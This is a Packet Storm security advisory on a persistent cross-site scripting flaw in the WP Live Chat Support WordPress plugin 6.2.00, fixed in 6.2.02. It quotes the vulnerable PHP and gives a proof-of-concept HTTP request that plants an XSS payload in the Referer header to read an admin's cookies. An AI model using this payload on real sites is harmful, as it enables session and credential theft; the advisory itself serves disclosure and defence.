WordPress Live Chat Support 6.2.00 Cross Site Scripting

2016-07-11T00:00:00
ID PACKETSTORM:137859
Type packetstorm
Reporter Han Sahin
Modified 2016-07-11T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Persistent Cross-Site Scripting in WP Live Chat Support plugin  
------------------------------------------------------------------------  
Han Sahin, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A persistent Cross-Site Scripting (XSS) vulnerability has been found in  
the WP Live Chat Support plugin. By using this vulnerability an attacker  
can supply malicious code on behalf of a logged on WordPress user in  
order to perform a wide variety of actions, such as stealing victims'  
session tokens or login credentials, performing arbitrary actions on  
their behalf, and logging their keystrokes.  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on WP Live Chat Support WordPress  
plugin version 6.2.00.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue has been fixed in version 6.2.02 of the WP Live Chat Support  
plugin. The updated plugin can be downloaded from the following  
location:  
https://downloads.wordpress.org/plugin/wp-live-chat-support.zip.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_live_chat_support_plugin.html  
  
The WP Live Chat Support plugin uses the Referer header to present the current page on which the chat is initiated to backend (wp-admin) chat users. However, the URL retrieved from the database isn't properly output encoded according to output context (JavaScript and HTML). As a result persistent Cross-Site Scripting is introduced.  
  
$wpdb->insert(  
$wplc_tblname_chats,  
array(  
'status' => '5',  
'timestamp' => current_time('mysql'),  
'name' => $name,  
'email' => $email,  
'session' => $session,  
'ip' => maybe_serialize($user_data),  
'url' => $_SERVER['HTTP_REFERER'],  
'last_active_timestamp' => current_time('mysql'),  
'other' => maybe_serialize($other),  
),  
array(  
'%s',  
'%s',  
'%s',  
'%s',  
'%s',  
'%s',  
'%s',  
'%s',  
'%s'  
)  
);  
  
The PHP code of the vulnerable output (HTML and JS context) is as follows:  
  
echo " <span class='part1'>" . __("Chat initiated on:", "wplivechat") . "</span> <span class='part2'>" . $result->url . "</span>";  
  
The PHP code for the page is as follows:  
  
</span> <a href='"+v_browsing_url+"' target='_BLANK'>"+v_browsing+"</a><br /><span class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"' target='_BLANK'>"+v_email+"</a></span>";  
  
The malicious code supplied by an attacker can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.  
  
Stored Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users. The victim (potentially even WP-admin) only has to view the wplivechat-menu page which generally is the first page when the plugin is opened.  
  
http://<wordpress site>/wp-admin/admin.php?page=wplivechat-menu  
Proof of concept  
  
This vulnerability can be demonstrated by intercepting the wplc_start_chat action after filling in your name and e-mail and then changing the Referer header relative path to the Cross-Site Scripting payload.  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: 192.168.28.129  
Content-Length: 117  
Accept: */*  
Origin: http://192.168.28.129  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.28.129/'"><img src=x onerror=alert(document.cookie)>/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8,nl;q=0.6  
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set; wplc_chat_status=5; iflychat_guest_id=1467535930we14g; iflychat_guest_session=320f0212654acf6216884952f5766c7b; iflychat_guest_name=Guest%20Norene; iflychat_key=undefined; iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=  
Connection: close  
  
action=wplc_start_chat&security=5d2beba087&name=Sahin&email=han.sahin%40securiy.nl&cid=1742&wplcsession=1467535929687  
`